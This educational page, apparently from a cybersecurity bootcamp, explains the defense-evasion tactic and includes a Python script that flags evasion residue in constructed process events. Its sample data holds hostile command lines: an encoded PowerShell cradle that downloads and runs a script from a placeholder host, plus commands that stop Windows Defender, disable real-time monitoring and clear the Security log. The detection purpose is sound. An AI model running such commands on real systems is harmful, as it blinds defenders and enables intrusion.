Defense evasion is the set of techniques attackers use to avoid being detected, such as obfuscating or encoding code, disabling or tampering with security tools, and hiding payloads inside legitimate processes. In the MITRE ATT&CK framework it is the tactic TA0005, and it is unusual because it does not describe a single goal like stealing data. Instead, it wraps around almost everything else an attacker does, turning a noisy action into a quiet one.
Why Defense Evasion Matters
Every other tactic, from credential theft to lateral movement, becomes far more dangerous when it goes unseen. An attacker who can act without triggering an alert gains the one resource that matters most: time. That is why evasion is treated less like an optional step and more like a baseline requirement for serious intrusions.
The scale of this is striking. In Anthropic's analysis of real-world attacks, defense evasion was the single largest tactic, observed in 84.4% of the actors studied, which you can read about in our breakdown of how hackers use AI. When more than four in five adversaries prioritize staying hidden, detection becomes the central problem of modern defense.
Common Defense Evasion Techniques
Defense evasion covers dozens of distinct methods, but most fall into a few recognizable families: obfuscating or encoding code so it no longer matches known signatures (ATT&CK T1027, Obfuscated Files or Information), disabling or tampering with security tools (T1562, Impair Defenses), hiding payloads inside legitimate processes (T1055, Process Injection), and clearing logs and other traces of activity (T1070, Indicator Removal).
These techniques are powerful precisely because they target the assumptions defenders rely on. Signature-based scanners assume malicious code looks recognizable, and obfuscation breaks that assumption. Monitoring assumes logs are complete, and log clearing breaks that one.
Detecting and Countering Evasion
Because evasion attacks the tools that watch for attacks, no single product stops it. The defensive answer is layering. Modern endpoint detection and response platforms focus on behavior rather than signatures, flagging suspicious injection, tampering with security services, and abnormal command lines that obfuscation cannot easily hide.
Beyond automated detection, human-led threat hunting assumes an evasive actor may already be inside and goes looking for the residue they leave behind: cleared logs, disabled defenses, or a process spawning where it should not. The lesson of an 84.4% prevalence rate is simple. Defenders cannot assume silence means safety, because the most capable adversaries spend their first effort making sure you hear nothing at all.
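The two points above, that obfuscation defeats a raw-text signature while behavior does not, and that hunting looks for residue such as cleared logs, disabled defenses and processes spawning where they should not, can be shown in a few lines of triage logic. The following is an added example written for this page, not code from the original article or any vendor's detection content. The process-creation events are constructed (fields loosely modeled on Sysmon Event ID 1 / Windows 4688: parent image, image, command line), the rule patterns are assumptions about what a hunter would check, and the helper and tag names are made up for illustration.

```python
"""Behavioral triage of constructed process-creation events for defense-evasion residue.

Added example, not code from the original page. Every regex below is an
assumption about what a hunter would look for, not a vendor's detection rule.
"""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent: str    # parent process image path
    image: str     # created process image path
    cmdline: str   # full command line as logged


def _name(path: str) -> str:
    """Basename of a Windows-style path, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# A naive string signature for a download cradle; base64 encoding defeats it.
CRADLE_RE = re.compile(r"(?i)downloadstring|invoke-webrequest|net\.webclient")
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-e[a-z]*\s+([A-Za-z0-9+/=]{16,})")
# Stopping the Defender service or switching real-time monitoring off (Impair Defenses).
TAMPER_RE = re.compile(
    r"(?i)\bsc(?:\.exe)?\s+(?:stop|delete|config)\s+(?:windefend|sense|sysmon\w*|mssecflt)"
    r"|set-mppreference\b.*-disable"
)
# Clearing Windows event logs (Indicator Removal).
LOGCLEAR_RE = re.compile(r"(?i)\bwevtutil(?:\.exe)?\s+(?:cl|clear-log)\b|clear-eventlog")

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def decode_encoded_command(cmdline: str) -> str | None:
    """Return the plaintext of a -EncodedCommand argument, or None if absent or invalid.

    PowerShell base64-encodes the script as UTF-16LE, so decoding restores the
    text that a string signature could have matched.
    """
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def triage(ev: ProcEvent) -> list[str]:
    """Return the findings for one event; an empty list means nothing was flagged."""
    findings: list[str] = []
    effective = ev.cmdline
    decoded = decode_encoded_command(ev.cmdline)
    if decoded is not None:
        findings.append("encoded_command")
        effective = decoded  # analyze what will actually run, not the wrapper
    if CRADLE_RE.search(ev.cmdline):
        findings.append("signature_hit")         # raw text matched the signature
    elif CRADLE_RE.search(effective):
        findings.append("cradle_after_decode")   # visible only after decoding
    if TAMPER_RE.search(effective):
        findings.append("defense_tampering")
    if LOGCLEAR_RE.search(effective):
        findings.append("log_clearing")
    if _name(ev.parent) in OFFICE_PARENTS and _name(ev.image) in SCRIPT_HOSTS:
        findings.append("abnormal_parent")       # a document viewer spawning a shell
    return findings


def triage_all(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map event index to findings, keeping only events with at least one finding."""
    return {i: f for i, ev in enumerate(events) if (f := triage(ev))}


def _encode_ps(script: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events (not real telemetry); 10.0.0.5 is a placeholder address.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoP -W Hidden -enc "
              + _encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a.ps1')")),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\sc.exe", "sc stop WinDefend"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\wevtutil.exe", "wevtutil cl Security"),
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"C:\Windows\System32\cmd.exe", r'cmd /c "whoami /all > %TEMP%\w.txt"'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", r"notepad.exe C:\notes.txt"),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -ep bypass -c Set-MpPreference -DisableRealtimeMonitoring $true"),
]

if __name__ == "__main__":
    for i, findings in triage_all(SAMPLE_EVENTS).items():
        print(i, _name(SAMPLE_EVENTS[i].image), findings)
```

Run as a script it prints one line per flagged event. The first event is the point of the exercise: the raw command line never contains the string DownloadString, so the signature misses it, but decoding the argument and applying the same check to what will actually execute flags it; the remaining hits (service stop, log clear, Office spawning cmd.exe) are exactly the residue the hunting paragraph describes, and the benign notepad event produces no finding.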
How We Teach Defense Evasion
In our Cybersecurity Bootcamp, you won't just learn about Defense Evasion in theory. You'll practice with real tools in hands-on labs, guided by industry professionals who use these concepts daily.
Covered in:
Module 10: Penetration Testing and Ethical Hacking
360+ hours of expert-led training • CompTIA Security+ included